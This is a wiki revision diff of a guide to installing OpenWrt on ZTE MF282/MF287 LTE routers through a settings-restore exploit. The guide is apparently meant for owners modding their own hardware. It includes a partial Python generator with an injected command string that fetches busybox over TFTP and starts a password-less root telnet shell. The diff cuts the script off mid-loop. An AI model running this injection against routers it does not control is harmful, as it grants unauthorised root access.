Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
projects:zte_mf28x [2023/10/14 10:43] – [Option 1: Install from OEM firmware] Andreas Böhlerprojects:zte_mf28x [2024/03/10 20:19] (current) Andreas Böhler
Line 8: Line 8:
 </WRAP> </WRAP>
  
-The following models will be supported by OpenWrt 23.x:+The following models are supported by OpenWrt 23.05 and onwards:
  
   * MF282   * MF282
Line 19: Line 19:
 ===== ZTE MF282 ===== ===== ZTE MF282 =====
  
-The MF282 is supported by OpenWrt 23.onwards. In order to install it, you need to disassemble the device, attach serial console and perform a few commands in the UART shell.+The MF282 is supported by OpenWrt 23.05 onwards. In order to install it, you need to disassemble the device, attach serial console and perform a few commands in the UART shell.
  
 <WRAP round important 80%> <WRAP round important 80%>
Line 29: Line 29:
 ===== ZTE MF282+ ===== ===== ZTE MF282+ =====
  
-This device has a completely different hardware. An OpenWrt port is work in progress. The modem is not Qualcomm-based but uses a Marvell PXA1827 module. +This device has a completely different hardware. An OpenWrt port is available, but this device is not supported by OpenWrt 23.05. The modem is not Qualcomm-based but uses a Marvell PXA1827 module. 
  
 The MF282+ can be identified by the model type "DreiTube" on the bottom. It is IPQ4019 based (so quite powerful) and most instructions of the MF287 series applies, including exploits and installation instructions. The MF282+ can be identified by the model type "DreiTube" on the bottom. It is IPQ4019 based (so quite powerful) and most instructions of the MF287 series applies, including exploits and installation instructions.
Line 36: Line 36:
  
 The newer MF287 series is more powerful than the MF282 and features four Gigabit-ports, a quad-core CPU and a CAT12 LTE modem. Since it can be had for less than €10,- used, it is a bargain! The newer MF287 series is more powerful than the MF282 and features four Gigabit-ports, a quad-core CPU and a CAT12 LTE modem. Since it can be had for less than €10,- used, it is a bargain!
 +OpenWrt supports all models from 23.05 onwards.
 ==== Option 1: Install from OEM firmware ==== ==== Option 1: Install from OEM firmware ====
  
 You need an exploit to get access to the stock firmware. Prepare the following: You need an exploit to get access to the stock firmware. Prepare the following:
  
-  * TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well+  * TFTP server - tftpd-hpa on Linux is tested, and tftpd64 on Windows is known to work
   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)
   * Rename busybox to "telnetd" and put it to your TFTP root directory   * Rename busybox to "telnetd" and put it to your TFTP root directory
Line 52: Line 52:
   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.
   - Watch your TFTP server serving the file "telnetd"   - Watch your TFTP server serving the file "telnetd"
-  - Use a Telnet client and connect to 192.168.0.1 +  - Use a Telnet client and connect to 192.168.0.1 on port 10023 
-  - Login as user "admin" and password "admin"+  - You should be logged-in immediately, no need for a password
   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):
  
Line 61: Line 61:
  
 <WRAP round important 80%> <WRAP round important 80%>
-Please double-check the partition number by running cat /proc/mtd and looking for the line named rootfs. Use this mtd number.+Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number.
 </WRAP> </WRAP>
  
Line 102: Line 102:
 Make sure to take a backup of your partitions. There is no firmware download available. Make sure to take a backup of your partitions. There is no firmware download available.
 </WRAP> </WRAP>
- 
-There is a pending PR for adding OpenWrt support to this device. Before it is accepted, you need to build from my personal github at https://github.com/andyboeh/openwrt/tree/zte_mf287plus 
  
 ==== Restore stock ==== ==== Restore stock ====
Line 139: Line 137:
  
 <WRAP round important 80%> <WRAP round important 80%>
-Unlocking does not work on the MF282+ aka DreiTube! The LTE module uses a compltely different hardware architecture.+Unlocking does not work on the MF282+ aka DreiTube! The LTE module uses a completely different hardware architecture.
 </WRAP> </WRAP>
  
Line 158: Line 156:
 setenv serverip 192.168.1.100 setenv serverip 192.168.1.100
 setenv ipaddr 192.168.1.1 setenv ipaddr 192.168.1.1
-tftpboot 0x82000000 openwrt.bin +tftpboot openwrt.bin 
-bootm 0x82000000+bootm
 </code> </code>
   * After a few minutes, OpenWrt has started   * After a few minutes, OpenWrt has started
Line 206: Line 204:
 Should you require more details for any of the steps provided, please have a look at the excellent documentation in the OpenWrt Wiki at https://openwrt.org. If you're still not getting along, then this procedure is not for you. Should you require more details for any of the steps provided, please have a look at the excellent documentation in the OpenWrt Wiki at https://openwrt.org. If you're still not getting along, then this procedure is not for you.
  
-===== Exploit MF287in detail =====+===== Exploit MF287 in detail =====
  
-The settings file of the MF287is obfuscated and encrypted. Fortunately, the algorithm isn't very complicated and could be easily decompiled using Ghidra. The following Python script creates the "exploit.dat" file as linked to above:+The settings file of the MF287 is obfuscated and encrypted. Fortunately, the algorithm isn't very complicated and could be easily decompiled using Ghidra. The following Python script creates the "exploit.dat" file as linked to above:
  
 <code python [enable_line_numbers="true"]> <code python [enable_line_numbers="true"]>
Line 233: Line 231:
             return False             return False
                  
-        exploit = ";zte_debug.sh 192.168.0.22 telnetd; sleep 3600\n" +        exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n"           out = bytearray()
-        out = bytearray()+
         for char in exploit:         for char in exploit:
             if char != '\n' or char != '\t' or char != '\0':             if char != '\n' or char != '\t' or char != '\0':